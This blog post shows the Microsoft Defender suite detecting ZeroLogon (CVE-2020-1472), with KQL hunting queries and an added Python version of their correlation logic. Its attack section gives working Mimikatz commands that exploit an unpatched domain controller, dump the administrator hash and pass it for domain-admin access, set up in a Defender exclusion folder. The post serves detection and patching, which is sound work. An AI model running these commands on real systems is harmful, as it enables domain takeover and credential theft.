ZeroLogon detected by the Microsoft Defender suite
CVE-2020-1472 (Netlogon Elevation of Privilege Vulnerability) is a critical vulnerability (CVSS score 10/10) in the Netlogon Remote Protocol (MS-NRPC). It is publicly known as ZeroLogon. 99% of all known attacks use one or more known vulnerabilities and almost never zero-days.
A Microsoft patch was released in August 2020, but since the release of the first PoC (Proof-of-Concept) by Tom Tervoort (Secura) on 11-09-2020, several security researchers, including Benjamin Delpy (Mimikatz), Dirk-jan Mollema (Fox-IT) and the NCC Group, have created easy-to-use tools to exploit the vulnerability. Since that moment Microsoft has seen an extreme rise in exploitation attempts (via a silent detection in Microsoft Defender for Identity, internal use only).
The Attack
For the attack we use a Windows 10 computer, an unpatched Domain Controller and Mimikatz. Create an exclusion folder (Windows Defender) and download the latest release of Mimikatz.
The first step is to log on to the Windows 10 computer with user credentials and try to access the domain controller; the result is access denied (as it should be).
Let's start Mimikatz (from a Command Prompt run as Administrator). The first command verifies whether the domain controller is vulnerable to the ZeroLogon attack.
lsadump::Zerologon /target:<DC-FQDN> /account:<DC>$ /null /ntlm
The second command exploits the vulnerability.
lsadump::Zerologon /target:<DC-FQDN> /account:<DC>$ /null /ntlm /exploit
The third command dumps the administrator NTLM hash.
lsadump::dcsync /domain:<domain-fqdn> /dc:<DC> /user:administrator /authuser:<DC>$ /authdomain:<domain> /authpassword:"" /authntlm
The fourth and final command re-uses the NTLM hash to create a session with domain admin credentials (domain dominance).
privilege::debug
sekurlsa::pth /user:administrator /domain:vuln /rc4:a87f3a337d73085c45f9416be5787d86
Let's verify whether we can now access the domain controller: yes, we can.
We have successfully exploited the ZeroLogon vulnerability.
Microsoft Defender for Identity
Microsoft Defender for Identity (previously Azure ATP) is the product in the Defender suite that detects attacks on Active Directory. The ZeroLogon detection has been officially available since the 1st of October.
The attack (CVE-2020-1472 exploitation) is detected if audit logging is enabled.
The alert details show whether the attempt was successful or unsuccessful.
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint (previously Microsoft Defender ATP) is the product in the Defender suite that detects attacks on devices through EDR (Endpoint Detection and Response) anomaly detection.
Microsoft Defender for Endpoint has two types of detections:
- Vulnerability Management (proactive)
- Threat Detection (reactive)
Threat and Vulnerability Management
The Threat and Vulnerability Management (TVM) module detects vulnerabilities (exposure level) in software, both Microsoft and non-Microsoft (third-party, 3P).
The exposure details list the individual CVEs. A red bug icon indicates that a public exploit is available (to prioritize the mitigation/patch process).
The CVE details include the release date, score, references, etc., as well as the required remediation steps (the KB article with the patch).
Threat Detection
The Alerts and Incidents pages (an incident is a correlation of entity-related alerts) show the risk level of the device.
The incident (a correlation of 3 alerts) shows the attack on the endpoint via Mimikatz (even though the tool was downloaded into an excluded folder).
Microsoft 365 Defender
Microsoft 365 Defender (previously Microsoft Threat Protection) is the multi-source detection tool for the Modern Workplace (Microsoft 365 E5 Security license) covering the organization's identities, devices, apps and data.
Incidents
The cross-source incident in Microsoft 365 Defender is a correlation of multiple incidents from the underlying products.
The ZeroLogon attack is detected, and the incident is correlated from Microsoft Defender for Identity and Microsoft Defender for Endpoint data.
Hunting
Advanced hunting is the second cross-source feature of Microsoft 365 Defender. The hunting example below walks through the correlation logic behind the scenes for the ZeroLogon attack.
The first KQL query uses Microsoft Defender for Identity (Azure ATP) alert data to identify the source device from which the ZeroLogon attack was launched, as the starting point for retrieving the process and network connection details.
// Find all Netlogon exploit attempt alerts containing source devices
let queryWindow = 3d;
AlertInfo
| where Timestamp > ago(queryWindow)
| where ServiceSource == "Azure ATP"
| where Title == "Suspected Netlogon privilege elevation attempt (CVE-2020-1472 exploitation)"
| join (AlertEvidence
| where Timestamp > ago(queryWindow)
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
) on AlertId
| summarize by AlertId, DeviceId, Timestamp
The output is the AlertId (required for the second query).
The second KQL query takes that AlertId as NLAlertId and hunts in the Microsoft Defender for Endpoint data for the process that launched the ZeroLogon attack.
// Find potential endpoint Netlogon exploit evidence from AlertId
let NLAlertId = "aa6cef45fd-f3e9-4823-9753-60e14d844439";
let lookAhead = 1m;
let lookBehind = 60m;
let NLEvidence = AlertEvidence
| where AlertId == NLAlertId
| where EntityType == "Machine"
| where EvidenceDirection == "Source"
| where isnotempty(DeviceId)
| summarize Timestamp=arg_min(Timestamp, *) by DeviceId;
let sourceMachine = NLEvidence | distinct DeviceId;
let alertTime = todatetime(toscalar(NLEvidence | distinct Timestamp));
DeviceNetworkEvents
| where Timestamp between ((alertTime - lookBehind) .. (alertTime + lookAhead))
| where DeviceId in (sourceMachine)
| where RemotePort == 135 or RemotePort between (49670 .. 49680)
| summarize (Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid)=arg_min(ReportId, Timestamp, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountSid), TargetDevicePorts=make_set(RemotePort) by DeviceId, DeviceName, RemoteIP, RemoteUrl
| project-rename SourceComputerName=DeviceName, SourceDeviceId=DeviceId, TargetDeviceIP=RemoteIP, TargetComputerName=RemoteUrl
The output correlates the Microsoft Defender for Identity and Microsoft Defender for Endpoint data to give a clear picture of the attack (timeline and method).
Source: https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034 (including a correction of the typo ZLEvidence in the linked post, which should be NLEvidence).
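The correlation the two queries perform, reimplemented in Python over constructed sample records so the time window and port filters can be checked offline. This is an added example, not code from the original post or from Microsoft; the alert id, device ids, host names, IP and timestamps are assumed values.

```python
from datetime import datetime, timedelta

# Constructed sample records (not from the article or from Microsoft's data): one
# Defender for Identity alert-evidence row and a few endpoint network events.
T0 = datetime(2020, 10, 5, 14, 30)  # assumed alert time
ALERT_EVIDENCE = [{"AlertId": "ALERT-ID-PLACEHOLDER", "EntityType": "Machine",
                   "EvidenceDirection": "Source", "DeviceId": "dev-ws10", "Timestamp": T0}]

def _event(device, port, offset_min, report_id):
    return {"DeviceId": device, "DeviceName": device.upper(), "RemoteIP": "10.0.0.5",
            "RemoteUrl": "dc01.example.local", "RemotePort": port, "ReportId": report_id,
            "Timestamp": T0 + timedelta(minutes=offset_min),
            "InitiatingProcessFileName": "mimikatz.exe"}

NETWORK_EVENTS = [
    _event("dev-ws10", 135, -1, 10),     # RPC endpoint mapper, inside the window
    _event("dev-ws10", 49674, -1, 11),   # dynamic RPC port, inside the window
    _event("dev-ws10", 445, -1, 12),     # SMB: not a Netlogon port, must be dropped
    _event("dev-ws10", 135, -120, 5),    # before lookBehind, must be dropped
    _event("dev-other", 135, 0, 13),     # different source device, must be dropped
]
NETLOGON_PORTS = {135} | set(range(49670, 49681))   # RemotePort == 135 or 49670..49680
LOOK_BEHIND, LOOK_AHEAD = timedelta(minutes=60), timedelta(minutes=1)

def correlate(evidence, events, alert_id):
    """Python version of the second query: the alert's source device and earliest evidence
    time select Netlogon-port connections in the window, one row per target."""
    rows = [e for e in evidence if e["AlertId"] == alert_id and e["EntityType"] == "Machine"
            and e["EvidenceDirection"] == "Source" and e.get("DeviceId")]
    if not rows:
        return []
    first = min(rows, key=lambda e: e["Timestamp"])        # arg_min(Timestamp, *)
    device_id, alert_time = first["DeviceId"], first["Timestamp"]
    lo, hi = alert_time - LOOK_BEHIND, alert_time + LOOK_AHEAD
    groups = {}
    for ev in events:
        if (ev["DeviceId"] != device_id or ev["RemotePort"] not in NETLOGON_PORTS
                or not lo <= ev["Timestamp"] <= hi):
            continue
        g = groups.setdefault((ev["DeviceName"], ev["RemoteIP"], ev["RemoteUrl"]),
                              {"first": ev, "ports": set()})
        if ev["ReportId"] < g["first"]["ReportId"]:
            g["first"] = ev   # arg_min(ReportId, ...) keeps the earliest report
        g["ports"].add(ev["RemotePort"])
    return [{"SourceDeviceId": device_id, "SourceComputerName": name, "TargetDeviceIP": ip,
             "TargetComputerName": url, "Timestamp": g["first"]["Timestamp"],
             "InitiatingProcessFileName": g["first"]["InitiatingProcessFileName"],
             "TargetDevicePorts": sorted(g["ports"])} for (name, ip, url), g in groups.items()]
```

Running correlate() over the sample data yields one row for the domain controller with ports [135, 49674] and the earliest mimikatz.exe report; the SMB, out-of-window and other-device events are filtered out just as the KQL where clauses do.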
Summary
The different Microsoft Defender products discover the ZeroLogon attack in different stages of the attack. Microsoft Defender for Identity detects the attack on Active Directory (domain dominance). Microsoft Defender for Endpoint detects the vulnerability via the TVM module (from initial release date to public exploit availability) and the attack via the threat detection module on the alert and incident pages. Microsoft 365 Defender brings all this information together to give a clear understanding of the attack via the correlated incidents. This is where you can see the true power of XDR (eXtended Detection and Response).
I hope this blog gives some insight into the advantages of the Microsoft Defender suite and the need to mitigate CVE-2020-1472 (update the systems) as soon as possible.